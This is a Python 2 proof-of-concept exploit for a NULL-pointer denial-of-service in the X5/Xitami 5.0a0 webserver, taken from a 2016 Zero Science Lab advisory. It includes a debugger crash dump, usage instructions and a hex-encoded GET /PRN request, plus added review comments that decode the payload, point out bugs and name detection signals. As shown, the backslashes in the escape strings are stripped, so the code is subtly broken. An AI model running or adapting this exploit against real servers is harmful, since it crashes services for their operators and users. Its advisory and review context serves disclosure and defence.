X5 Webserver 5.0 Remote Denial Of Service Exploit
#!/usr/bin/env python
#
#
# X5 Webserver 5.0 Remote Denial Of Service Exploit
#
#
# Vendor: iMatrix
# Product web page: http://www.xitami.com
# Affected version: 5.0a0
#
# Summary: X5 is the latest generation web server from iMatix Corporation.
# The Xitami product line stretches back to 1996. X5 is built using iMatix's
# current Base2 technology for multithreading applications. On multicore machines,
# it is much more scalable than Xitami/2.
#
# Desc: The vulnerability is caused due to a NULL pointer dereference when processing
# malicious HEAD and GET requests. This can be exploited to cause denial of service
# scenario.
#
# ----------------------------------------------------------------------------
#
# (12c0.164c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# *** WARNING: Unable to verify checksum for C:zslabws64327xitami-5.0a0-windowsxitami.exe
# *** ERROR: Module load completed but symbols could not be loaded for C:zslabws64327xitami-5.0a0-windowsxitami.exe
# eax=0070904d ebx=03a91808 ecx=0070904d edx=00000000 esi=0478fef4 edi=0478fe8c
# eip=00503ae0 esp=0478fb28 ebp=0478fb48 iopl=0 nv up ei pl zr na pe nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
# xitami+0x103ae0:
# 00503ae0 8b02 mov eax,dword ptr [edx] ds:002b:00000000=????????
# 0:004> kb
#
# ChildEBP RetAddr Args to Child
# WARNING: Stack unwind information not available. Following frames may be wrong.
# 00 0478fb48 00460ee6 0ace0840 04025ea0 0478fd78 xitami+0x103ae0
# 01 0478fe8c 0045f6fa 0ace0bd8 0478ff28 cccccccc xitami+0x60ee6
# 02 0478fee8 004c60a1 0478ff14 00000000 0478ff38 xitami+0x5f6fa
# 03 0478ff28 004fdca3 03a90858 03a67e38 00000000 xitami+0xc60a1
# 04 0478ff40 00510293 03a90858 fc134d7d 00000000 xitami+0xfdca3
# 05 0478ff7c 00510234 00000000 0478ff94 7679338a xitami+0x110293
# 06 0478ff88 7679338a 03a91808 0478ffd4 77029902 xitami+0x110234
# 07 0478ff94 77029902 03a91808 7134bcc2 00000000 kernel32!BaseThreadInitThunk+0xe
# 08 0478ffd4 770298d5 00510190 03a91808 00000000 ntdll!__RtlUserThreadStart+0x70
# 09 0478ffec 00000000 00510190 03a91808 00000000 ntdll!_RtlUserThreadStart+0x1b
#
# ----------------------------------------------------------------------------
#
# Tested on: Microsoft Windows XP Professional SP3 (EN)
# Microsoft Windows 7 Ultimate SP1 (EN)
#
#
# Vulnerability discovered by Stefan Petrushevski aka sm - <stefan@zeroscience.mk>
#
#
# Advisory ID: ZSL-2016-5377
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5377.php
#
#
# 15.11.2016
#

# NOTE(review): What this script does, as written: open one TCP connection to
# <target>:<port>, send a single hard-coded HTTP request, close nothing
# explicitly, and print "BOOM!". No response is read, so the script cannot
# tell whether the request was delivered or whether the server crashed.
#
# The script is Python 2 (print statements, str payload passed to send()).
# As reproduced on this page every backslash has been stripped (see also the
# "C:zslabws..." paths in the header), so the 'x47x45...' literals below are
# plain ASCII text rather than the byte escapes the author presumably wrote;
# the same loss may explain the trailing spaces in the print strings.

import sys, socket

# Usage guard: fewer than two positional arguments prints the banner and
# exits with status 0 (not an error status).
if len(sys.argv) < 3:
    print '------- X5 Webserver 5.0a0 - Remote Denial of Service ------ '
    print ' Usage: ' + sys.argv[0] + ' <target> <port> '
    print 'Example: ' + sys.argv[0] + ' 8.8.8.8 80 '
    print '------------------------------------------------------------ '
    sys.exit(0)

host = sys.argv[1]
# int() raises ValueError on a non-numeric port; there is no try/except here.
port = int(sys.argv[2])

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# socket.connect() returns None, so `connect` is always None and is never used.
# A refused or unreachable target raises socket.error and ends the script with
# a traceback; nothing catches it.
connect = s.connect((host, port))
# The timeout is set AFTER connect(), so it does not bound the connect itself.
# It only applies to the send() below; no recv() is ever performed, so the
# 666-second value is effectively irrelevant.
s.settimeout(666)

# Hex-decoded (reviewer-decoded from the digits below), the intended request is:
#
#   GET /PRN HTTP/1.1
#   Host: 172.19.0.215
#   User-Agent: ZSL-Fuzzer-Agent/4.0.285
#   Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,
#           text/plain;q=0.8,image/png,*/*;q=0.5
#   Accept-Language: en-us,en;q=0.5
#   Accept-Encoding: gzip,deflate
#   Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
#   Keep-Alive: 300
#   Connection: keep-alive
#
# Two things worth knowing when reading or detecting this:
#  - The Host header is a fixed lab address (172.19.0.215); it is NOT derived
#    from the <target> argument, so it will not match the host actually hit.
#  - The request is otherwise ordinary; the only unusual element is the path
#    "/PRN" (a reserved device name on Windows). Presumably that path is what
#    reaches the NULL dereference in the crash dump above -- the advisory text
#    says only "malicious HEAD and GET requests", so treat this as inference.
#    Requests for such paths, and the "ZSL-Fuzzer-Agent" User-Agent, are the
#    obvious log/IDS signals for this PoC.
payload = (
    'x47x45x54x20x2fx50x52x4ex20x48x54x54x50x2fx31x2ex31x0dx0a'
    'x48x6fx73x74x3ax20x31x37x32x2ex31x39x2ex30x2ex32x31x35x0d'
    'x0ax55x73x65x72x2dx41x67x65x6ex74x3ax20x5ax53x4cx2dx46x75'
    'x7ax7ax65x72x2dx41x67x65x6ex74x2fx34x2ex30x2ex32x38x35x20'
    'x0dx0ax41x63x63x65x70x74x3ax20x74x65x78x74x2fx78x6dx6cx2c'
    'x61x70x70x6cx69x63x61x74x69x6fx6ex2fx78x6dx6cx2cx61x70x70'
    'x6cx69x63x61x74x69x6fx6ex2fx78x68x74x6dx6cx2bx78x6dx6cx2c'
    'x74x65x78x74x2fx68x74x6dx6cx3bx71x3dx30x2ex39x2cx74x65x78'
    'x74x2fx70x6cx61x69x6ex3bx71x3dx30x2ex38x2cx69x6dx61x67x65'
    'x2fx70x6ex67x2cx2ax2fx2ax3bx71x3dx30x2ex35x0dx0ax41x63x63'
    'x65x70x74x2dx4cx61x6ex67x75x61x67x65x3ax20x65x6ex2dx75x73'
    'x2cx65x6ex3bx71x3dx30x2ex35x0dx0ax41x63x63x65x70x74x2dx45'
    'x6ex63x6fx64x69x6ex67x3ax20x67x7ax69x70x2cx64x65x66x6cx61'
    'x74x65x0dx0ax41x63x63x65x70x74x2dx43x68x61x72x73x65x74x3a'
    'x20x49x53x4fx2dx38x38x35x39x2dx31x2cx75x74x66x2dx38x3bx71'
    'x3dx30x2ex37x2cx2ax3bx71x3dx30x2ex37x0dx0ax4bx65x65x70x2d'
    'x41x6cx69x76x65x3ax20x33x30x30x0dx0ax43x6fx6ex6ex65x63x74'
    'x69x6fx6ex3ax20x6bx65x65x70x2dx61x6cx69x76x65x0dx0ax0dx0a'
)
# send() may deliver fewer bytes than len(payload); the return value is ignored
# (sendall() would be the usual choice for "send the whole buffer").
s.send(payload)
# BUG: `s.close` without parentheses is an attribute reference, not a call --
# the socket is never closed explicitly and is only released at interpreter exit.
s.close
# Printed unconditionally after send(); it does not indicate the server crashed.
print 'BOOM! '